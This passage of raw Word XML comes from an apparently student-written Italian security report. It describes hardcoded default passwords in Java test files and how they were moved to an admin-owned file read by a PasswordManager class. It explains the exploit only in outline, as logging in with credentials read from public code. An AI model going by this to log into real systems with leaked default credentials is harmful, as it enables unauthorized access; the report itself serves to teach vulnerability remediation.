      </w:r>
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e 56, 70, 84 per </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UserServiceTest.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204E0CC3" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="00B63358">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backend e, se il codice è pubblico, chiunque può accedere a queste password, rendendo la vulnerabilità facilmente sfruttabile. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AB848" w14:textId="21B8DC94" w:rsidR="00DA7D75" w:rsidRDefault="00185FB3" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo caso l</w:t>
      </w:r>
      <w:r w:rsidR="00DA7D75">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00491A55">
        <w:t xml:space="preserve"> password sono inserite in chiaro nel codice e quindi sono leggibili da chiunque</w:t>
      </w:r>
      <w:r w:rsidR="00DA7D75">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00242251">
        <w:t xml:space="preserve"> Di conseguenza, l’exploit consiste nel leggere le password dal codice</w:t>
      </w:r>
      <w:r w:rsidR="007019BC">
        <w:t xml:space="preserve"> come mostrato nelle Figure 5 e 6</w:t>
      </w:r>
      <w:r w:rsidR="00242251">
        <w:t>, in modo da fare il login con gli utenti creati di default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B43D6C" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26739669" w14:textId="0351DE71" w:rsidR="00DA7D75" w:rsidRDefault="00B63358" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251756544" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76CF5004" wp14:editId="45A85D23">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>468630</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4918710</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5182870" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1815059248" name="Casella di testo 1"/>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B3635D7" w14:textId="01752866"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4E2F86">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>5</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="004D1ACC">
                              <w:t>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004" id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:36.9pt;margin-top:387.3pt;width:408.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G5+94l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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0B3635D7" w14:textId="01752866" w:rsidR="00B63358" w:rsidRPr="00C12BD7"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4E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>5</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="004D1ACC">
                        <w:t>UserControllerTest.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DA7D75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A140FFE" wp14:editId="06DB4A62">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5182870" cy="4857750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="474948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870" cy="4857750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F46495B" w14:textId="4F3A90A1" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484B28C2" w14:textId="5F0F0B81" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48004EF4" w14:textId="36C5D51A" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4673D6EA" w14:textId="49300D10" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1919F4CF" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61788F0B" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D33BE2" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C68194" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E04167" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003D5867" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41878C88" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED33C22" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4E5A10" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D59E4E" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057DF4BB" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F68DFAA" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BA2AF2" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA45377" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD8A770" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E118670" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739CF506" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220E2C4B" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A43D807" w14:textId="77777777" w:rsidR="00370730" w:rsidRDefault="00370730" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF95FBE" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C63D82" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2CE599" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16DF14F5" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688DAA41" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52879125" w14:textId="2E8F144F" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251759616" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="420AD54B" wp14:editId="6DEAA87D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>535940</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5020310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5048250" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="216987569" name="Casella di testo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9679074" w14:textId="421E4B59" w:rsidR="00B63358" w:rsidRPr="009E79D1"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4E2F86">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>6</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: UserService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D54B" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:42.2pt;margin-top:395.3pt;width:39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4w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NPtdEY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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="79679074" w14:textId="421E4B59" w:rsidR="00B63358" w:rsidRPr="009E79D1" w:rsidRDefault="00B63358" w:rsidP="00B63358">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>6</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserServiceTest.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251757568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A8FCE4D" wp14:editId="575BC695">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-541655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5048250" cy="5505052"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapNone/>
            <wp:docPr id="848576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505052"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F27EFF9" w14:textId="6E1F8239" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5066C946" w14:textId="3AFEF33E" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6446CCB8" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382BA8A6" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2312318D" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0371A55A" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E142777" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0446A15A" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF35D85" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F124115" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F50EB4C" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673ADFD7" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141429FF" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B05FEF2" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAF3E9E" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE326F6" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F762DCA" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49139528" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E67378B" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A684B5" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D331B88" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754CBE46" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73DC62EC" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD7BE3F" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="00B63358"/>
    <w:p w14:paraId="4D377D78" w14:textId="06CF89BF" w:rsidR="00B63358" w:rsidRPr="00ED7083" w:rsidRDefault="00DA7D75" w:rsidP="00B63358">
      <w:r w:rsidRPr="00ED7083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r w:rsidR="00ED7083" w:rsidRPr="00ED7083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB4D28" w14:textId="554820DB" w:rsidR="000B2D9C" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Per il fix è stato u</w:t>
      </w:r>
      <w:r w:rsidR="00491A55">
        <w:t>sa</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00491A55">
        <w:t xml:space="preserve"> un file in cui sono salvate le password, posseduto solo dall’admin in modo tale che solo lui rimane a conoscenza delle password. </w:t>
      </w:r>
      <w:r w:rsidR="00DA7D75">
        <w:t xml:space="preserve"> L’inserimento delle password è gestito da un </w:t>
      </w:r>
      <w:r w:rsidR="00DA7D75" w:rsidRPr="00B63358">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PasswordManager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">situato </w:t>
      </w:r>
      <w:r w:rsidR="007019BC">
        <w:t xml:space="preserve">nel file </w:t>
      </w:r>
      <w:r w:rsidR="007019BC" w:rsidRPr="007019BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PasswordManager.java</w:t>
      </w:r>
      <w:r w:rsidR="007019BC">
        <w:t xml:space="preserve"> da noi creato, visibile in Figura 8</w:t>
      </w:r>
      <w:r w:rsidR="00DA7D75">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In tal modo le password rimangono protette e non sono accessibili con il codice sorgente pubblico</w:t>
      </w:r>
      <w:r w:rsidR="007019BC">
        <w:t xml:space="preserve"> come si può notare in Figura 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3572B2" w14:textId="1ABF9601" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00DA7D75"/>
    <w:p w14:paraId="213F1310" w14:textId="46B22FCA" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0758173B" w14:textId="51432775" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="184E0838" w14:textId="5782B953" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5496FA" w14:textId="070B3EE2" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FE28D2C" w14:textId="49AB76F3" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72247083" w14:textId="5DAE603E" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39606C53" w14:textId="77777777" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="044D3716" w14:textId="77777777" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6040CCA2" w14:textId="554D0979" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AEE00CC" w14:textId="21DDE142" w:rsidR="00DA7D75" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251761664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="581755BA" wp14:editId="07893AAD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-178435</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3526790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6475095" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1054483717" name="Casella di testo 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5EF5949" w14:textId="0017FCF5"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4E2F86">
